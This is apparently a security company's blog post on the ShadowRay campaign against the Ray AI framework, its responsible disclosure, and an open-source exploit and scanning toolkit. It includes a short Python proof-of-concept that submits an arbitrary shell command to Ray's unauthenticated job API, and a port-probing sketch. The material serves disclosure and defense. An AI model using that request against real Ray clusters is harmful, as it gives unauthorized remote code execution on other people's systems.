Introduction

Recently, researchers at Oligo Security uncovered an active hacking campaign against Ray, a highly popular AI infrastructure tool, exploiting vulnerabilities first discovered on our huntr AI bug bounty platform by researcher Sierra Haex in collaboration with Protect AI's Threat Research team. At Protect AI, our commitment to securing artificial intelligence systems against emerging threats has always driven us to adopt a forward-thinking approach, especially from a hacker's perspective. This proactive stance stems from our understanding that AI infrastructure, with its complexity and breakneck adoption rate, presents a target that cyber adversaries cannot ignore.

The campaign against Ray, dubbed ShadowRay, was inevitable and is likely the first of many such campaigns directed towards AI deployments. Our anticipation of such vulnerabilities and the subsequent exploits did not arise in a vacuum. Instead, it was the product of our extensive focus on practical AI attacks, a viewpoint that considers not if, but when and how these systems could be compromised. This incident, unfortunately, confirms our predictions and underscores a critical insight: the exploitation of AI infrastructure is not an isolated event but likely the precursor to a series of sophisticated adversarial campaigns targeting these technologies.

Discovery of the Vulnerability: Expertise and Collaboration

The path to discovering the vulnerabilities in Ray, a cornerstone of AI infrastructure, was paved by a unique blend of expertise from Protect AI's seasoned machine learning engineers, adept hackers, and the rich community of security researchers fostered on our AI bug bounty platform, huntr.com. huntr is the world's first AI/ML bug bounty platform: a community of thousands of security researchers investigates and responsibly discloses hundreds of potential vulnerabilities every month, earning bounty rewards and CVEs for their findings.

The security research into Ray came about when Sierra Haex, a friend and collaborator of our in-house research team, reached out. Combining this outside perspective with our in-house machine learning and security expertise, the group decided to probe Ray, a target previously overlooked by much of the security community despite its immense popularity.

In a concerted effort, Sierra Haex and Protect AI threat researcher Dan McInerney dedicated an afternoon to scrutinizing Ray. In less than an hour, the team had unveiled multiple high- and critical-severity vulnerabilities, with the key finding, that Ray allows remote code execution without authentication, coming from Sierra Haex. These findings were promptly and responsibly reported. However, the Ray maintainers classified them as informational, citing the platform's architectural choices. Out of respect for the maintainers' wishes, we abstained from issuing CVEs for all of the discovered issues, but we credit the Ray team for quickly fixing the majority of them. Nonetheless, we remained convinced of the lingering security risks.
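To make the core issue concrete: in affected configurations, Ray's dashboard exposes a job submission REST API that accepts arbitrary shell commands without any authentication. The following is a minimal illustrative sketch of that class of weakness, assuming a dashboard listening on Ray's default port 8265; the target address and command are placeholders, and this is not the exact proof of concept that was reported.

```python
import requests

# Illustrative sketch only: in affected Ray deployments, the dashboard's
# job submission API runs arbitrary entrypoint commands with no
# authentication. The target and port are assumptions (8265 is Ray's
# default dashboard port); only test systems you own.
DASHBOARD = "http://127.0.0.1:8265"

resp = requests.post(
    f"{DASHBOARD}/api/jobs/",
    json={"entrypoint": "id"},  # the shell command the cluster will execute
    timeout=10,
)

# A 200 response with a job ID, obtained without supplying any credentials,
# indicates the cluster will run attacker-controlled code.
print(resp.status_code, resp.json())
```

In effect, anyone who can reach the dashboard port can run code on the cluster, which is why internet-exposed deployments made such attractive targets.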

This conviction led to the creation of the open source ai-exploits repository. This initiative is a testament to our commitment to elevating security awareness within the AI community and to providing free tools that help organizations assess and mitigate risks in their environments.

ai-exploits: Elevating AI Security Awareness

The ai-exploits repository embodies our distilled expertise in practical AI attacks, highlighting actionable security vulnerabilities within the AI domain and giving organizations the tools to test and scan their own AI deployments. Metasploit modules help organizations' red teams determine the impact of the vulnerabilities, and Nuclei templates help their blue teams find the vulnerabilities in their environments, all wrapped up in an easy-to-deploy Docker image.

Curiously, many professional-grade vulnerability scanners lack plugins that detect these highly impactful vulnerabilities. Because of this, the repository also includes a custom Nmap script to help find potentially vulnerable AI tools, illustrated below. The repository is free to use and is updated monthly with additional tooling as we and the valued researchers at huntr.com uncover new vulnerabilities.
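For a sense of what such a scan looks for, here is a minimal Python sketch in the same spirit: it probes a few default ports commonly used by AI tooling and flags anything listening. The port-to-tool mapping is our assumption based on common defaults, not the repository's actual fingerprinting logic.

```python
import socket

# Hypothetical sketch of the kind of check such a script performs:
# probe default ports of popular AI tooling and report anything listening.
# The port/tool mapping below is an assumption based on common defaults.
DEFAULT_PORTS = {
    8265: "Ray dashboard",
    5000: "MLflow tracking server",
    7860: "Gradio app",
    8888: "Jupyter",
}

def probe(host: str) -> None:
    for port, tool in DEFAULT_PORTS.items():
        try:
            with socket.create_connection((host, port), timeout=2):
                print(f"[+] {host}:{port} open - possible {tool}")
        except OSError:
            pass  # closed, filtered, or unreachable

probe("127.0.0.1")
```

An open port is only a lead, of course; confirming that a service is actually vulnerable is the job of the Nuclei templates and Metasploit modules described above.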

The Path Forward

The discovery of the ShadowRay campaign against Ray serves as a stark reminder of the security challenges facing the AI community. We believe similar campaigns are likely already underway against multiple other tools that have been the focus of our internal research and the huntr community's work. Carve your name into the history of AI security research by becoming a huntr.

"Having projects like Ray be developed in the open allows researchers like myself, Dan McInerney and others to assist and work alongside developers to find these sorts of bugs and squash them. AI developers are doing important work, and if we can help make their tools more secure, the faster we all can progress." said Sierra Haex.

Our collaborative research, enhanced by contributions from independent security experts on the huntr.com AI bug bounty platform, uncovers a terrain fraught with vulnerabilities. These vulnerabilities open the door to full system compromises, unauthorized access to sensitive data, models, or credentials, frequently without the need for authentication. Far too often, the focus on theoretical or academic research—such as devising methods to deceive a model into misclassifying an image—diverts attention from these practical security challenges that pose a more immediate threat to the integrity of AI systems.

We believe that securing AI tools requires a collaborative effort involving developers, users, researchers, and the broader open-source community. By sharing our findings and working together, we can ensure that the AI tools we rely on are not only powerful and efficient but also secure and resilient against threats.

Special Thanks

We extend our gratitude to the AI and security communities for their support and collaboration. Thanks to researcher Sierra Haex for their work on securing the Ray project, and to the Ray maintainers, who fixed many of the issues quickly. Our research is driven by a commitment to securing the future of AI, and we look forward to continuing our work with the community to achieve this goal.